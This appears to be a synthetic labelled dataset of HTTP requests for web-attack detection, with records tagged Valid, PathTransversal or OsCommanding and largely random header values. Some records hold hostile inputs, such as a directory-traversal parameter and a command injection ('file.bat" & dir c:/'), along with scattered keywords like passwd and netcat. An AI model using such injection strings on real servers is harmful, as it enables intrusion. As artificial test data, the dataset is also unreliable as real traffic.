If-None-Match: "8L9FnjWtU@u@r@3g7l.c"
If-Range: *
Max-Forwards: 850
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM bG50b29hbXJPb29sZHJlTUE0aXNxc2llaGh1aHZ0c0VlY2pScGR0
Authorization: Digest nc=d4Cc5cDf
Range: 545941-
Referer: http://sulehnii.it/7elO/3ietee.php
TE: trailers
Trailer: If-None-Match
User-Agent: o7peothuactan
UA-CPU: x86
UA-Disp: 884,253,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 139x000
Via: 1.8 www.iqoan0t.jpeg:650, 1.6 219.152.179.179:00311
Transfer-Encoding: gzip
Upgrade: ier7qt/0.9, a9hc/3.6, ins/7.0, tttS5/5.5
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46539
Start - Id: 9946
class: Valid
GET /lcHvqthe/rwkbkXMQ_VSfRjZO/toit8ifadealvntsh/dRTlGw3jJbZw9MZi0/Bajg@ZMNe/t1MV6d.WNeQt7-btz8gt/aUceeti8eifo8moHcat/ghcAdliuz/gPkU_x.php3?noaearo=7&osheneenp0fdo=Ihfaeeiowop7ph&tndfai=1tsrjaslraroh&edtr3icenyIPee=he9nrdwws&dp=replace%2Fa2&rYwfOol=nitrfi0ofpewEfcpew&oeg=5nurha+se7bgsound&Snio=sw&eno=797442&oFBY0Fh=7&Qtsnb=wT9RPCm0573 HTTP/1.0
Host: www.gofa.net:80
Connection: keep-alive
Accept: text/plain;q=0.4
Accept-Charset: iso-8859-15;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: gho3b-ited;q=0.9, o-Sspuonsu, int-tiu;q=0.6
Cache-Control: max-age=71
Client-ip: 52.145.216.151
Cookie: 4Ptcx332rwto=7690757
Cookie2: $Version="885"
Date: Fri, 01 Jul 05 24:34:12 CET
ETag: W/"PW@SOkgZPzXc29Dr"
Expect: 100-continue
From: snyou@r8tka9etrf.de
If-Modified-Since: Mon, 30 Jun 08 14:55:54 CET
If-Unmodified-Since: Tue, 29 May 07 16:08:15 UTC
If-Match: "isefntLp6v-OuOCpy"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWlobGZlNnJyc2FlaTBiczhiOFJyYWxhbHNwdGVzdXQydEF5RXR5ZQ==
Authorization: vlzsei ptmi=p6aaam
Range: -96
Referer: http://www.ataut.be/bendhbng/ttrAlrc/odaTn.php4
TE: trailers,deflate,trailers
Trailer: Via
User-Agent: wttycs (yBiZOb7ky; iyLUskogh.)
UA-CPU: Sparc
UA-Disp: 042,750,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 596x007
Via: FTP/7.7 www.unwe.shtml, 5.9 177.2.7.144
Transfer-Encoding: deflate
Upgrade: EIecm6/9.9, iperio/2.0, nea/8.0, testdg/7.3, TvsW/8.2
Warning: 335 216.175.93.201 "tnhedoshTilnhmYf" 
X-Forwarded-For: 126.125.147.228
X-Serial-Number: 939778978647707
----: --------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 9946
Start - Id: 5583
class: Valid
POST /wDKftp.2/st9nEnnusnei/osaygo/dr/s3EcW/kgO8CF65C21G/nIxsXtK9SG-OXtuqN/ieroeot.php3? HTTP/1.1
Content-Length: 148
Content-Language: ToAl,dtuuSnu
Content-Encoding: identity
Content-Location: /bgqhaE/2ggtisw/unOr/ejafure.wmn
Content-MD5: c3d0dDZvcnNybG9vZWlHQw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 05 Mar 10 03:35:30 UTC
Last-Modified: Sun, 08 Oct 06 18:51:09 UTC
Host: 193.95.201.178:80
Connection: 9lHfnu
Accept: */*;q=0.6
Accept-Charset: koi8-r, x-mac-korean
Accept-Encoding: 
Accept-Language: o-noerwrat
Cache-Control: max-age=6
Client-ip: 69.57.15.36
Cookie: sirhentlh=9465036036;GTIHADkBcpu5=sbceaeaaot;ntciso=9138
Cookie2: $Version="811"
Date: Mon, 05 Jun 06 20:06:53 GMT
ETag: "fuxz3LZh9X2M1kWy0"
Expect: e2iw
From: lsbetkih@rdl7oi5.fr
If-Modified-Since: Tue, 23 May 06 11:56:42 CET
If-Unmodified-Since: Sun, 19 Feb 06 22:08:56 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 20
MIME-Version: 6.2
Pragma: naaw8oR=timye
Proxy-Authorization: c9oqp 5lei=rnNhes
Authorization: Basic YUF0RzptZ3ZU
Range: 673-
Referer: http://hEest.st/7ynmsalt/nshwndq/amrOcos/5hik.jpg
TE: trailers,chunked
Trailer: If-Modified-Since
User-Agent: cnhwxoNbun/6.9.3.9
UA-CPU: x86
UA-Disp: 972,439,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0202x3743
Via: 4.5 102.249.165.169, oT8Eoe/1.0 39.122.179.202
Transfer-Encoding: gzip
Upgrade: aCrv/3.2, uNt/4.1, agThej/0.7
Warning: 189 www.tsXitt6.gif "8U5tatshea" 
X-Forwarded-For: 180.152.86.133
X-Serial-Number: 07654558799930280172
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ojaaNlntecaoit=abetweenyDpzi 4nt&oaolrllwedolaoo=0itontlbh&gisttorez=1aliye&OCtarsratni=3403&rorv=gsayl&Hei=execi&se=ni?wrconnectwdAt&uqsqtnf=0334

End - Id: 5583
Start - Id: 45960
class: PathTransversal
GET /card/esObeqhnneVau1/wtnbgeys9rii7rsfH0tc/AmBz/LAw-Mautoexec-c7positionRW4Y/prebgsoundwXD5WNetXaF/t4rbtlReeyeeehdnUl.asmx?tdirz=air0m12e1njeoldt&hogieiesteatOl=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fenngll%2Fllgeisorat%2Fterollet%2Fmeenmenira.nsf&4JGBpqhtaccesopt=reyepoeiit&Vtoah=%24&HvsdTfrenetrdz=um0EUzzcMvea&h16lafxo=t%29 HTTP/1.1
Host: www.eBnehmae9R.org:80
Connection: te3dmh
Accept: application/*;q=0.9, video/mpeg;q=0.4, audio/x-wav
Accept-Charset: windows-1254
Accept-Encoding: deflate;q=0.8, compress
Date: Sun, 06 May 07 20:52:58 GMT
If-Match: "wrzQ1MO@qhdCVQ5H8gd"
Max-Forwards: 52
Pragma: no-cache
Referer: /sogn.dll
User-Agent: Mozilla/6.5 (X11; U; Solaris 3.8; s3-ol; rv:9.5.4) Gecko/97810413

null

End - Id: 45960
Start - Id: 43698
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .com? HTTP/1.1
Host: www.nfaocoi.com
Connection: close
Accept: text/html, video/quicktime;q=0.2
Accept-Charset: cp-936, euc-jp
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 152.233.157.213
Cookie: tsnei=z;emsAfaeRhgeuelu=uGo5nc36siatse;qGv1p= g8grLhp4/oE;b9dHyytebMAdDrb=9snrsgyd\;wqt=2ai
Cookie2: $Version="51"
Date: Sun, 29 Apr 07 19:52:01 UTC
ETag: "-4D7Jo4QjAO6o6dlRPcD"
Expect: 7lboei
From: efdn@eboax.net
If-Modified-Since: Tue, 22 May 07 06:19:44 GMT
If-Unmodified-Since: Thu, 18 Dec 08 20:39:07 CET
If-Match: *
If-None-Match: *
If-Range: "ayE5StEBc5.RGeB-K"
Max-Forwards: 0
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: csat8 fle0=tohc
Authorization: Digest cnonce="gbd9a8u"
Range: 0932-655,7-822597,-7
Referer: http://www.ptSt.fr/qmanlse6/E6s8p/1eiwhjnt.jsp
TE: trailers,deflate;q=0.7
User-Agent: Mozilla/7.3 (X11; U; SunOS sun4u 6.0; wr-eA; rv:7.5.6) Gecko/32024626
UA-CPU: 68000
UA-Disp: 911,720,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5641x613
Via: 2.6 115.72.82.89, ofnN/5.0 120.196.83.9
Transfer-Encoding: identity
Upgrade: as8/8.8, mad/2.6, pEyuj/1.9, o5a8/8.7, ewmi2m/5.2
Warning: 158 www.shecn.js "Itetalhi5ooybnjthhbi" "Tue, 24 Jun 08 17:50:39 GMT"
X-Forwarded-For: 51.55.191.62
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43698
Start - Id: 22742
class: Valid
GET /inP0/eu6su-ecmycVku.shtml?YQt7XixF1=ti-q7Ets2xw%27na%3Ein%3Ai&acceptObexecO2F=4sv7+&MMZft.9WNo6=eTjoaadminww%3Arselect+&eeaeeesq53pq=%26H9olrhee&Is8asGEuwslmle=hewlocga-eei7&i0md=xouisesvy&tlbW=zVsN&cthebvmsgep=xtermaortw%2F2hntA&OaZ=esybTCc&BwodE=1%3Da&hziEnmfprteEai=var0j%3Bat3idtpu0rneqs+es HTTP/1.0
Host: www.rpuiI.it
Connection: ooteo
Accept: application/postscript;q=0.1
Accept-Charset: us-ascii
Accept-Encoding: gzip, deflate, identity;q=0.3
Accept-Language: *
Cache-Control: no-store
Client-ip: 111.95.11.244
Cookie: rY3.71dtCkk=24;8Igekedr99xsatt=80;arieieeDEecE=31;nullsnetcatIagoFM7xp_4=yHla
Cookie2: $Version="9"
Date: Sun, 28 Aug 05 09:53:05 CET
ETag: W/"Hw.-vMq@PRe4kqvba1"
Expect: hepFi=alinog
From: labOkeyp@Tmrr6ene.de
If-Modified-Since: Fri, 30 Jun 06 17:07:51 CET
If-Unmodified-Since: Mon, 28 Sep 09 16:51:55 UTC
If-Match: "_8iGAGe4imwVAX2pk_"
If-None-Match: "zze@bdwlbn6CC6JP"
If-Range: *
Max-Forwards: 80
MIME-Version: 9.4
Pragma: unt9stHe=oAetu
Proxy-Authorization: Digest qop=ldtEtf6e
Authorization: NTLM YTByZWhpaDNieG9vcmFpdEhydGFpNnF3YWgxYXQyOXRub29paXM4ZXNzOXA=
Range: 32-,55-8,-1
Referer: http://4ixi.be/1seneCy/4ebe1hep/irosjeaN/seph/3DJ5ne3.png
TE: trailers
Trailer: Referer
User-Agent: dnGsl51/7.4.9.8.8
UA-CPU: MIPS
UA-Disp: 866,9955,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 675x225
Via: FTP/9.2 www.UWo8ae.gif
Transfer-Encoding: gzip
Upgrade: vds/3.8, vnaet/6.8
Warning: 950 135.96.59.66 "get026dNoiraiwlk" 
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 46126280
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22742
Start - Id: 6443
class: Valid
POST /hadoabeqsyeic8ameyn4/imDHKPVJob0a6a.shtml? HTTP/1.0
Content-Length: 176
Content-Language: mlca1ead,e
Content-Encoding: gzip
Content-Location: http://mfEclnv.it/nzeyhlu/mnia/anaR/nuee/ithtiD.zip
Content-MD5: ZXVneW9yYXBpdG1jaG5yZA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 14 Dec 06 15:57:15 CET
Last-Modified: Thu, 16 Mar 06 15:04:25 GMT
Host: 31.213.34.14:6868
Connection: close
Accept: text/*, application/postscript, audio/x-wav;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: identity, deflate;q=0.7, gzip
Accept-Language: hy-toshbr;q=0.8, E-tysoylci, rShE-9dbp;q=0.5, tsuhaek-Dntlo;q=0.4, enwuchas-hdAgiy;q=0.1
Cache-Control: no-transform
Client-ip: 174.238.79.189
Cookie: Rns8aOctwv9=slevalieOaacereCho0positionqdp;v8P6etbezEua=e76etrorp;lshheettec=7Xuld2;drcbog=deseh;wtXrQvbscriptNK=oesig o;ajwisiotgrjaeu=770s
Cookie2: $Version="1"
Date: Fri, 31 Mar 06 01:27:08 CET
ETag: ".0.CU-Fuui1IMPBFhiS"
Expect: 100-continue
From: 3n6as@eicEn.st
If-Modified-Since: Thu, 21 Feb 08 04:11:38 UTC
If-Unmodified-Since: Wed, 15 Oct 08 15:13:13 UTC
If-Match: "Xsqz8Ydr6fnUd@Npcb0"
If-None-Match: "pOb@P3O-hY9tew4m"
If-Range: Fri, 23 Apr 04 05:56:39 GMT
Max-Forwards: 957
MIME-Version: 6.5
Pragma: ittl='treuub'
Proxy-Authorization: NTLM Y0FkaGNkZWV1YzN2YWx0ZWp0cHNsR2xPYVlhQTY2c3dlcGhhblJ0Z2tzZ2lhY2E=
Authorization: Digest realm
Range: 20995-3,994884-5,-38008
Referer: /larclo0f/e2Mhi/nxnai/gan2.mp3
TE: deflate
Trailer: Accept
User-Agent: hcedtnhwYtisraa7ams
UA-CPU: 68000
UA-Disp: 0332,310,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8174x6805
Via: 5.6 118.151.144.223
Transfer-Encoding: compress
Upgrade: aasyat/1.2, sml/6.2, u6l7/7.3, oabN1/3.1
Warning: 732 www.f0zh.png "f2rdso" 
X-Forwarded-For: 3.49.116.125
X-Serial-Number: 45754151629
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~

Tboot.iniK7document.rO@=o.vI&inisfglBis0Tk2=u3orcuOtdtrworged&tngaE=eim goFud e&TEtr=342&YczTechoFNhuQm=neia&rtr=c3oojntol&28nr1rtinu5ntu=cwOxA2yht&ogmahsmsdahx=mNirtrHlandeall

End - Id: 6443
Start - Id: 8647
class: Valid
GET /vwlratid/tn9t/sewgzRdX01Wz/dzdiaenxsnM5mPtiisr4/tohut3snletrnd8lmh/eakiioa0tywena.dll?cmietueayne3=9&sxdwintCMe4tf=osOke9gsSi&8n=923&hfcnwnizoBt5se0=hpassthrukeb&mptyipodiedat9=61&ue=m%2Flocationueey47&hnieHd=0930004 HTTP/1.1
Host: www.cknuE.biz
Connection: close
Accept: audio/basic, audio/basic;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, deflate, gzip;q=0.7, gzip, deflate
Accept-Language: irqe-t;q=0.3, qo4nedq-c, loher0-rdvge;q=0.8, qyh4stm-hIy4isa;q=0.6, enr-ooe
Cache-Control: max-age=4
Client-ip: 191.183.220.151
Cookie: et=qe;5csgmtey=4scriptnyshgc&p;QrU0HGpV7QUunion=sVLLMiQHzG;FLi5d6H=%:gI
Cookie2: $Version="7"
Date: Thu, 14 Apr 05 13:01:50 UTC
ETag: W/"TpLXVO1bJS@TYkTj7TW"
Expect: 100-continue
From: iqTi@9hcauaorqk.fr
If-Modified-Since: Wed, 07 Jan 04 18:56:06 CET
If-Unmodified-Since: Sun, 14 May 06 22:15:52 GMT
If-Match: *
If-None-Match: "qJuhsmkid_EZwUsNez1"
If-Range: *
Max-Forwards: 1
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: NTLM aGVkaUVwbmJvdmVFOHh1cm9nTGRvQW9yZWVlbmhldGJuOWVodGhsYW1pYXJ1RXJl
Authorization: NTLM ZWdpcnd3bXM4b29vc2VlN2x1aFN0ZzVlMjJsMWl0aHR1Mm1PZnVudGhhZXJy
Range: 35-163344,-38,631-
Referer: http://www.tnlaa.fr/ccIfc/rsbLs/ndresk3t/afber.swf
TE: trailers
Trailer: Host
User-Agent: Mozilla/7.2 (Machintosh; U; PPC 7.5; om-mf; rv:8.8.8) Gecko/90792276
UA-CPU: 68000
UA-Disp: 051,717,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 8393x485
Via: HTTP/8.7 119.202.255.84
Transfer-Encoding: identity
Upgrade: tul6nr/8.0, k5roha/7.1, edhia/4.1, tben/5.7
Warning: 888 www.beiaIt.css "S3j3Xr4oawsaaadt" "Mon, 27 Aug 07 01:27:20 GMT"
X-Forwarded-For: 71.14.68.150
X-Serial-Number: 396730650206
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 8647
Start - Id: 31310
class: Valid
GET /FYwHWinsertYhincludetR/hvE.tiff? HTTP/1.0
Host: www.tehf1fo.org:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: 6=ud
Client-ip: 115.41.215.171
Cookie: cmdHjB-fo=yt? ;rSs=168029;puuu=4
Cookie2: $Version="7"
Date: Sat, 02 Dec 06 14:14:13 UTC
ETag: ".Mf3VAK9lNE3bGy"
Expect: 9latsnht
From: Allouc@sein.uk
If-Modified-Since: Wed, 12 Jan 05 02:30:34 GMT
If-Unmodified-Since: Tue, 14 Jun 05 22:10:16 CET
If-Match: *
If-None-Match: *
If-Range: "0D4XadllQWvv.ZcAAds"
Max-Forwards: 4864
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="rnibihas"
Authorization: alhs s6lsgtd=sich
Range: -388719
Referer: /eniass/lslaay/AeaO4i/snpHew.jpg
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/2.0 (Windows; U; Windows NT 3.6; Ae-yO; rv:9.6.2) Gecko/14604226
UA-CPU: Sparc
UA-Disp: 1773,6929,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3795x126
Via: FTP/9.0 56.208.145.168
Transfer-Encoding: compress
Upgrade: GorsU/6.8
Warning: 428 www.goonyzo.tiff "hcaieedel5rnisnz" "Thu, 25 Dec 08 21:20:26 GMT"
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 61504
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31310
Start - Id: 28695
class: Valid
GET /7i1ncsEnpr/tt/eOiXo6e0h2/n0_RjVEkxm2_9nD/bREfTuQo.9rtiJUCg@.php3? HTTP/1.1
Host: www.cbehjsse.net:081
Connection: 8ueertmn
Accept: image/*;q=0.9, image/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=34
Client-ip: 253.175.212.106
Cookie: ma=Gi;hifs11baesaDs=(nd;at3egamdsee=tGUrEjyVSsQy;pmbvecgoS=r;moY=exed9nxsn3amr
Cookie2: $Version="59"
Date: Wed, 10 Mar 10 17:52:46 CET
ETag: "EsNhD0x-L@yMl16"
Expect: Acbne=4eswnec;iheie1
From: hoetolhz@mgi7iNed.uk
If-Modified-Since: Thu, 06 Dec 07 01:28:15 GMT
If-Unmodified-Since: Tue, 13 Jan 09 21:33:29 GMT
If-Match: "crYiOxyWUGtisckeu"
If-None-Match: *
If-Range: "umI3D4BWBledmLW"
Max-Forwards: 46
MIME-Version: 1.9
Pragma: jt=dsouce
Proxy-Authorization: Digest response="402fAbe20bCA7521de8FBa324bDF8Af8"
Authorization: Digest realm
Range: -440021
Referer: http://www.qnhahn.de/wFa0aeg/aeasabwn/5eezo/h8orm/yeal0eem.zip
TE: trailers,trailers,gzip;q=0.9
Trailer: If-Unmodified-Since
User-Agent: esknEiop/7.3.2
UA-CPU: Sparc
UA-Disp: 7978,1841,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 621x541
Via: 4.7 220.100.5.42
Transfer-Encoding: compress
Upgrade: mptnoI/0.5, iTp4m/8.4, 0hyWd/3.5
Warning: 417 www.s6ichD.shtml:356 "oeoto4eteouhiek" "Fri, 16 Jan 09 24:05:53 UTC"
X-Forwarded-For: 70.75.45.186
X-Serial-Number: 244229732731
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28695
Start - Id: 15520
class: Valid
GET /5east7t3svro/sejlslh1ettaa/aVaTXp0Ulu6sgYJyiaw/hei/aWtUi-/7eweosezotpu5Zecfdsu/lKt/it0cyjyJvpKC1FLbs/47-7iCdZgv363ORMvu1.bin?am=yehthwilf&L8svee9=5197486&AHnRdk=%3Edropre&iTshne=nyi4r&fFoluohiAiNipnw=iehw6atug&5giRee=tsdZD_n HTTP/1.1
Host: www.leue.net
Connection: keep-alive
Accept: */*
Accept-Charset: iso-10646-ucs-2;q=0.9, windows-874;q=0.9
Accept-Encoding: 
Accept-Language: rhE-tuhIaose;q=0.7, nratt-v;q=0.2
Cache-Control: max-stale
Client-ip: 210.248.209.57
Cookie: 2..Jhn=esam0dstdinfe0+slgaGss0ma;pa65=challl1oD$\Anode
Cookie2: $Version="524"
Date: Mon, 19 Sep 05 16:00:32 CET
ETag: W/"HfjNRiPZAw7WYjax@q"
Expect: iskib
From: seean@8ua2seurko.de
If-Modified-Since: Wed, 25 Jul 07 10:22:43 GMT
If-Unmodified-Since: Fri, 17 Dec 04 17:57:12 CET
If-Match: "FFlLOZCet0fq2hrGq"
If-None-Match: "CG0K0xvUYS13zEGd@8"
If-Range: Sat, 17 Sep 05 05:42:23 CET
Max-Forwards: 43
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM aXNlYWx0eWRvbThoYTVkZWFvVXRtaXNhd2RVZWRtbTBs
Authorization: Digest opaque="e4go9n78"
Range: 253580-
Referer: /STyi/Ewla/0yWb/h7Jtt.ace
TE: trailers
Trailer: Transfer-Encoding
User-Agent: 6faoev0/7.4.0
UA-CPU: x86
UA-Disp: 1586,7819,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 398x075
Via: 1.7 33.210.59.61
Transfer-Encoding: identity
Upgrade: thhe/1.0, eaei/8.0, nsecs/0.9, aadn/9.2, 7na/8.4
Warning: 428 113.186.5.1:5 "dkuzsat" 
X-Forwarded-For: 144.153.36.75
X-Serial-Number: 46412923699025736
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15520
Start - Id: 3300
class: Valid
GET /eEnxJQZG/hXrmmBXb_fD/ynHt9NKPvK@N8ZcrnRtu/oh7a/o0oZSHIaXjPOd.aspx?zd6=o-&evf9Walnba=16&ooiyg8E7etat=azG7zFLAdDg&eJiYy=693799&ccmneeeeelh5ocs=dtly&tsV@=eho&pok9siee5onhdyc=%24e%28qi&8fxono=9441975&tezztb=16 HTTP/1.1
Host: www.mwtyafsae.fr
Connection: close
Accept: video/quicktime;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: sn-bs;q=0.0, b4nanaay-on;q=0.6, aisy-iTT, resiqti-9wrnA, aor-ind4str
Cache-Control: max-stale=17123
Client-ip: 25.206.2.134
Cookie: 9asstAc=rD_xJru;loaAlkin=qiatla%;ie3roD5n=hBksiaImemakzenrnn;cetoy0i4io=emapasswdti wpiee;7fHettt=passwd;ewkirsi5etrI=4544863718
Cookie2: $Version="250"
Date: Mon, 24 Jan 05 18:20:21 CET
ETag: W/"B6CYsOrycHzh8pC52VW"
Expect: obew1
From: gooi@er7rmrhs.st
If-Modified-Since: Sat, 29 Aug 09 09:58:18 CET
If-Unmodified-Since: Sat, 09 Oct 04 23:51:19 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 18 Dec 05 12:19:30 CET
Max-Forwards: 389
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM Y3R0ZGRTcmxiZW1iYWRhb0p0dHpuSHRvMDh2YXRmUXRVbw==
Authorization: sitto qLaasrkg=sfn0ms
Range: 715429-,64862-,731-870612
Referer: /g8efm.mdb
TE: trailers,gzip;q=0.8,trailers
Trailer: Upgrade
User-Agent: Mozilla/2.5 (Windows; U; WinNT 6.7; oa-eu; rv:7.2.3) Gecko/71596657
UA-CPU: PowerPC
UA-Disp: 517,125,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 179x3842
Via: 3.7 www.6ieaia.png
Transfer-Encoding: gzip
Upgrade: bmdsep/9.4
Warning: 329 www.ims0.jpeg "mtefiw4rama7sn" 
X-Forwarded-For: 132.244.209.233
X-Serial-Number: 671477546416397721
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3300
Start - Id: 29366
class: Valid
GET /lseasaefe4T/m_Ok3/oD5e/nravIo/lkJ1L8NmvnIhcQ9QG/i22lnraetn9/Ne/aus5b/Wwindow.open/aiWeC4vQniorr8eo/.kk.bin?ihdxyiafhSdid=lIbscriptlaardtuhphpasswdmb&lxaa=newo&UZBIQ=0tc&kchnog30ses=3&OghinpidL9iraht=elor&@5UdsystemgobjectpN=0qhuvslogacceptdW1l-l5&adr7=s0lm6eutat08nj&dLtooaiR=01829076&rc=cete HTTP/1.0
Host: 71.69.114.247
Connection: close
Accept: */*
Accept-Charset: euc-cn;q=0.6, iso-8859-8-i
Accept-Encoding: identity, identity;q=0.4, gzip, compress
Accept-Language: Nciehfej-1nnaT;q=0.2, te-nme
Cache-Control: no-cache
Client-ip: 129.46.116.107
Cookie: gtdkstfnsa=e5O_Da
Cookie2: $Version="515"
Date: Wed, 17 Aug 05 10:59:34 GMT
ETag: "yCNaZ-TcwtMtyiBBrm"
Expect: 100-continue
From: muhbsl@whsoklhxlr.org
If-Modified-Since: Sun, 21 Sep 08 21:49:42 GMT
If-Unmodified-Since: Sun, 21 Nov 04 19:08:50 CET
If-Match: "L24.Gota.8MrhQSqJ."
If-None-Match: *
If-Range: "ahn3BJgDvEILptD3"
Max-Forwards: 1
MIME-Version: 3.1
Pragma: ao1taif=mceyuqsc
Proxy-Authorization: NTLM dGR4SWw0YzQ1ZTNvbnJxRW5udWFjb2FsbWVuYzNyaW53ejM3dGVyclZzdG53Y3E=
Authorization: 2wSec sgqA=6jh8
Range: 415-76250
Referer: /6riaf9/so5o/nrll/pgyT/lpahai.fgf
TE: deflate;q=0.4
Trailer: Accept-Charset
User-Agent: Mozilla/9.2 (X11; U; SunOS sun4u 0.9; em-on; rv:0.1.5) Gecko/83314174
UA-CPU: StrongARM
UA-Disp: 468,4853,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 2199x7171
Via: FTP/9.3 www.nLlauaab.gif, iEvyEl/7.0 219.225.220.24
Transfer-Encoding: gzip
Upgrade: c6ta/1.8
Warning: 287 172.161.207.253 "7xxeh2igzyi" "Tue, 23 May 06 22:25:33 GMT"
X-Forwarded-For: 10.176.141.74
X-Serial-Number: 725402
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 29366
Start - Id: 20128
class: Valid
GET /s3nti5tEuU6apaur/6F5Z@L4c@/sYerFHj-b7Kfg.WMeM/ltd_xZG1L3/i2g@TxC/ccU5u6TJu/acionwtacfgv9.gif?0wmubidsdx=l7ridnetcatds&lt2=8696286&wseeiDp=likealn&wAycei3renn=zntds HTTP/1.1
Host: 57.90.97.188
Connection: isaaauea
Accept: */*
Accept-Charset: iso-8859-5, iso-8859-1, x-mac-arabic;q=0.5
Accept-Encoding: gzip;q=0.0, compress
Accept-Language: eld-o2iMc;q=0.1, ndnteien-C5Us;q=0.2, swh-tiK, uot-lTd07;q=0.3, ctl-e
Cache-Control: no-transform
Client-ip: 172.243.53.120
Cookie: Yr0wa=m;IRzE@ST.=4645;2phSrdafouk2dfo=32682780
Cookie2: $Version="81"
Date: Sun, 20 Nov 05 05:49:19 UTC
ETag: "qP_Tnn6QpX5rkd0-WvP"
Expect: n30oiss=srsm
From: np1ebr9@yntet.it
If-Modified-Since: Sun, 20 Nov 05 11:36:23 CET
If-Unmodified-Since: Thu, 30 Apr 09 22:57:01 CET
If-Match: "iPwl0Zw7uw7w--5"
If-None-Match: *
If-Range: Thu, 23 Sep 04 23:35:58 CET
Max-Forwards: 2
MIME-Version: 0.6
Pragma: tero=6
Proxy-Authorization: NTLM dEVldGlyYW5yeGlyYWV6dWVobnRUZG5uYTNOY2NhUm9yZXN0bA==
Authorization: rnsr lAecfre=niotdps
Range: 48910-875971,804755-62
Referer: http://www.ijcthn.de/0iwsotb.sh
TE: trailers
Trailer: Host
User-Agent: 16dohg/1.4.4.4
UA-CPU: Sparc
UA-Disp: 972,951,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2245x9664
Via: FTP/7.2 www.msuttr.jpeg, hsa/6.0 202.45.158.175
Transfer-Encoding: eD5n
Upgrade: eedW/3.9, hidtfb/3.3, whnsue/8.0, 1snie/5.8, toq/7.1
Warning: 612 www.Isaot.png "toajSdoqt9ehchblh" "Thu, 03 Apr 08 19:04:43 GMT"
X-Forwarded-For: 143.125.40.136
X-Serial-Number: 01250528765
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20128
Start - Id: 7231
class: Valid
PUT /odm8tEdir/tmpfJ_7Y0/aerqa/v9IqbAga5qqovYJY/osLBQWe.s.jsp? HTTP/1.0
Content-Length: 70
Content-Language: sbietoqe,aoii
Content-Encoding: compress
Content-Location: /hokmctr/tt7sos/mteayj/amlhR.txt
Content-MD5: c3BhYXRodXN0aHJlYXRsdA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 13 Jul 07 24:40:17 GMT
Last-Modified: Sat, 02 Sep 06 03:19:53 GMT
Host: www.5saytAth.gov
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=7
Client-ip: 200.243.148.8
Cookie: TmY=09;Ao3t0rtnyt=f39r+;ircwssgndlnoied=cF3KgL09
Cookie2: $Version="340"
Date: Sat, 27 Feb 10 11:41:28 GMT
ETag: "lp6NS1Extn8N2tNnJG"
Expect: rri96osu
From: tEeitzcO@nnr4hrhhd.fr
If-Modified-Since: Thu, 15 Sep 05 05:28:16 GMT
If-Unmodified-Since: Fri, 17 Aug 07 21:43:48 CET
If-Match: "FKxwsBjv5wDvyfqVp4h"
If-None-Match: *
If-Range: Tue, 03 Nov 09 04:11:50 CET
Max-Forwards: 4
MIME-Version: 6.6
